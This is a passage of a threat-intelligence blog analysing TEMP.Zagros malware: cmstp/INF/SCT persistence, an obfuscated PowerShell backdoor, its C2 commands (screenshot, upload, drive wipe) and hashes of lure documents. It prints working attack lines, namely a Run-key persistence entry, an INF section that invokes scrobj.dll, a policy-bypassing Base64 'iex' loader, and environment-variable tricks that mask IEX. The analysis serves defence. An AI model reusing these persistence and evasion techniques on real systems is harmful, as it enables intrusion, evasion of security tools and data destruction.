\REGISTRY\USER\SID\Software\Microsoft\Windows\CurrentVersio
   n\Run\"WindowsDefenderUpdater"
= cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct

That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.


Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.

SCT File Analysis

The code of the Defender.sct file is an obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini)

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.


Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.


Figure 11: PowerShell script is XOR encoded using a single byte key

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • SYSID
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.


Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:


Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.


Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If command starts with “excel”, then it leverages DDEInitiate Method of Excel.Appilcation to execute the code: 
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code: 
    • If the command starts with “risk”, then execution is performed through DCOM object: 
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV


Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.


Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command

Purpose

reboot

Reboot the system using shutdown command

shutdown

Shut down the system using shutdown command

clean

Wipe the Drives, C:\, D:\, E:\, F:\

screenshot

Take a screenshot of the System

upload

Encrypt and upload the information from the system

excel

Leverage Excel.Application COM object for code execution

outlook

Leverage Outlook.Application COM object for code execution

risk

Leverage DCOM object for code execution

Conclusion

This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they deter the process of reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

SHA256 Hash

Filename

Targeted Region

eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894

na.doc

 

Pakistan

76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338

Invest in Turkey.doc

Turkey

6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac

güvenlik yönergesi. .doc

Turkey

009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0

idrbt.doc

 

India

18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6

Türkiye Cumhuriyeti Kimlik Kartı.doc

Turkey

3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb

Turkish Armed Forces.doc

 

Turkey

9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c

na.gov.pk.doc

 

Pakistan